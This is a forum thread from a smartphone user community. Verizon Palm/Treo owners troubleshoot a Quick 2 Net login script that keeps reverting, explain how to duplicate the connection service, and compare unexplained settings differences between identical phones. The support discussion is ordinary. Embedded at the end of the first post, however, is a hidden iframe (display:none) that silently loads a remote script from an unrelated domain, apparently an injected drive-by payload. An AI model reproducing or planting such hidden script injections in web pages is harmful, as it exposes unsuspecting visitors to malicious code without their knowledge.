+ Reply to Thread
Page 1 of 2 1 2 LastLast

network settings question

I followed the instructions in a previous post for the sending of data through verizon. I am experiencing a occassiona problem. Every once in awhile I get an authentication error. When I go the the "LOg in Script" screen the first send changed from at$qcmdr=2 to at$qcmdr=3 without memanually making the change. What is causing this to change?? How can I prevent this in the future<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Marc Chasin, MD

Re: network settings question

Originally posted by 1stcare
    I followed the instructions in a previous post for the sending of data through verizon. I am experiencing a occassiona problem. Every once in awhile I get an authentication error. When I go the the "LOg in Script" screen the first send changed from at$qcmdr=2 to at$qcmdr=3 without memanually making the change. What is causing this to change?? How can I prevent this in the future
    This seems to get changed after soft resets, and possibly other activities. The way to solve it is to create a new QNC connection with another name, but all of the same settings, and use it as your default network connection. Only the one named QNC reverts to the incorrect script. (The same thing happens if you use Expres network and use the 1X High Spreed Data connection, but their it is the second line send that gets changed from 0 back to 1. connections will still work, but I think they are slower).

Alan

Please show me how.

Hi, Alanb; can you show me how to create a new QNC connection step by step? Thanks.

Re: Please show me how.

Originally posted by Saisai
    Hi, Alanb; can you show me how to create a new QNC connection step by step? Thanks.
    He already did... Setting up a QNC network connection FAQ
    Please visit my picture site: Robert-O-Rama :)

Thank Robert. And thank Alan for his earlier post that I followed to set my network connection successfully 3 weeks ago. But I have the same problem as 1stcare, especially when I was using the Snappermail trail verson. Might be my question was not clear enough. What I mean is please show me how to create a new QNC connection with another name. I tried to change the Username from "qnc" to "abc" but I could not get connection with that.

Originally posted by Saisai
    Thank Robert. And thank Alan for his earlier post that I followed to set my network connection successfully 3 weeks ago. But I have the same problem as 1stcare, especially when I was using the Snappermail trail verson. Might be my question was not clear enough. What I mean is please show me how to create a new QNC connection with another name. I tried to change the Username from "qnc" to "abc" but I could not get connection with that.
    ok. User name does need to be QNC, it is the Service name that you want a new one of.

While on the network preferences screen, set up your QNC connection exactly as I described in the FAQ.

Then touch the menu button or tap the word preferences at the top of the screen. This will open up a menu with 3 choices, New, Delete, and Duplicate. Select Duplicate. This will make an exact copy of the QNC connection, but will add the word copy to the name. Change the name to whatever you want, and leave that one selected as your default.

When you soft reset, the script will get changed back to the incorrect one on the original QNC service, but not on your new copy.

Alan

I have done the procedure to set up a new QNC connection. Unfortunately, I am still experiencing the occassional error when I try to connect. It still resolves in changing at$qcmdr=2 to at$qcmdr=3. When I go back a day later it is back to =3. Any further suggestions
    Marc Chasin, MD

Originally posted by 1stcare
    I have done the procedure to set up a new QNC connection. Unfortunately, I am still experiencing the occassional error when I try to connect. It still resolves in changing at$qcmdr=2 to at$qcmdr=3. When I go back a day later it is back to =3. Any further suggestions
    You new connection has a different name then QNC? If it is just another connection with the same name, that will happen, but if you name is something totally different, it shouldn't. Mine is called "QNC Low Speed" and it has never changed from where I set it.

For reasons I won't get into, I now have two connections called just "QNC" and both of them do change.

Alan

WHERE is the details button????

For the life of me, I can't find the 'Details' button under the PDA Prefences. I can set the QNC (Quick2Net) and Assign Passowrd...but I can't get to the script. I could do that with my 6035. But not on the 7135.
    What am I missing????

Dagi

Re: WHERE is the details button????

Originally posted by Dagi
    For the life of me, I can't find the 'Details' button under the PDA Prefences. I can set the QNC (Quick2Net) and Assign Passowrd...but I can't get to the script. I could do that with my 6035. But not on the 7135.
    What am I missing????

Dagi
    If I remember correctly, someone said somewhere that the newer firmware does not allow access to modify the script.

Shwemp

Re: WHERE is the details button????

What am I missing????

Dagi
    The new phones from Verizon don't require this, as they come correctly configured from VZW and the scripting is all built in. These FAQ's were for using hte Alltel phones activated on Verizon.

Alan

Re: Re: WHERE is the details button????

Originally posted by shwemp
    If I remember correctly, someone said somewhere that the newer firmware does not allow access to modify the script.

Shwemp
    I can get to the script on my 7135 (MZ/SZ 36/23).

Prefs PDA/Network then click on the details button, then click on the script button.
    Dave

Re: Re: Re: WHERE is the details button????

Originally posted by dwdod
    I can get to the script on my 7135 (MZ/SZ 36/23).

Prefs PDA/Network then click on the details button, then click on the script button.
    I have the same 36/23 but It doesnt even have the details button for the "VZW Quick 2 Net" or "Express Netowrk (1XRTT)" options. When I created my own service it, I get a details & script for the that one though. I suppose the workaround would be to re-create your own QNC or EN with the script you want.
    iPhone therefore iAm.

This is hilarious.
    Peter and I both got our phones from Verizon B2B, order the same day from the same guy. Both are 36/23.
    He has the [Details] button, I don't.

We noticed a couple of other things that are different too.

Like: under Phone INfo - General, I have my phone number, model number, status and Data availability. He has the same except data availablility is not even listed.

There are more suddle differences. We both have the same plan for what it matters.

Strange.

This is hilarious.
    Peter and I both got our phones from Verizon B2B, order the same day from the same guy. Both are 36/23.

Like: under Phone INfo - General, I have my phone number, model number, status and Data availability. He has the same except data availablility is not even listed.

There are more suddle differences. We both have the same plan for what it matters.

Strange.
    It is defenitly not a firmware setting, but something in the Non volitale memory (which gets saved before doing a firmware update and restored when it is complete) and includes network settings info. I expected Dave's phone to be different, becuase it is much older then the official Verizon releases, but I am surprised to see two recent Verizon deliveries to be different.

Alan

This is hilarious.

Strange.
    Just to clear one piece up, here: If you're looking at one of the two original Verizon Services, either the Express Network or the VZW Quick 2 Net, you will not have the Details button, only Connect-- Those two entries are locked, so you can't change the details. If you have gone to the Services menu, made a new Service or duplicated an existing one, and are looking at that one, you'll have the Details button available. (Or, if there were other services on your previous Palm (my Visor grew about 10 when I installed a VisorPhone), and they came over, and you are looking at one of those.)

Regarding the phone info data availability, did you both have the same service quality at the time? If you're on analog when you're looking at it, there's no data availability.... Also, have you both updated your PRL's since you activated the phone? OTOH, if the words aren't even on the screen, and both phones were activiated, that's very odd!!

Now I'm curious -- What were some of the other differences? Also, did either of you sync a previous Palm config, and if so delete saved prefs and networkdb? This affects things like whether previous custom services you'd made get transferred over.

Originally posted by turboCat
    Just to clear one piece up, here: If you're looking at one of the two original Verizon Services, either the Express Network or the VZW Quick 2 Net, you will not have the Details button, only Connect-- Those two entries are locked, so you can't change the details. If you have gone to the Services menu, made a new Service or duplicated an existing one, and are looking at that one, you'll have the Details button available. (Or, if there were other services on your previous Palm (my Visor grew about 10 when I installed a VisorPhone), and they came over, and you are looking at one of those.)
    Nope, not true. We looked at the two original Verizon Services on both phones, EN and Quick2Net. Peter has the details button on his, I don't. So his are not locked. Same version 23/36, nothing done to the phones at that point in time other than charged and activated through *228 within a couple of minutes. We got them with the same fedex delivery.

One other difference: the Phone Preferences - > Phone Service, Peter has for ROam Option 'Auto' only, I have Automatic A, Automatic B and Standard.
    As I said, we both have the exact same plan, American Choice no EN. Even the same numbers.

Dagi

Thanks for clarifying that difference. That is interesting! Just as another tick, for PhonePrefs -> PhoneService -> RoamOptions, I have Automatic A, Automatic B, and No Roaming. Same s/w versions as you, same plan.

That just shows that the versions don't really tell the whole story.

BTW: Peter also doesn't have the [Reply] buttons on the Messages area when he receives a text message, I have it.
    I can't remember, but I thought somebody said that was based on an upgrade? Or is it based on plan? Well ... back to: we have the same plan.

Dagi

One more difference: Speeddial 1 is set for both phones to be voicemail, BUT: mine has *86 in it and is not changeable (bugs me because I would've liked to be able to add my password to the speeddial button).
    Peter's is not changeable either, says it's VoiceMail, but has -- in it. So pretty much Speeddial button 1 is unusable.

Dagi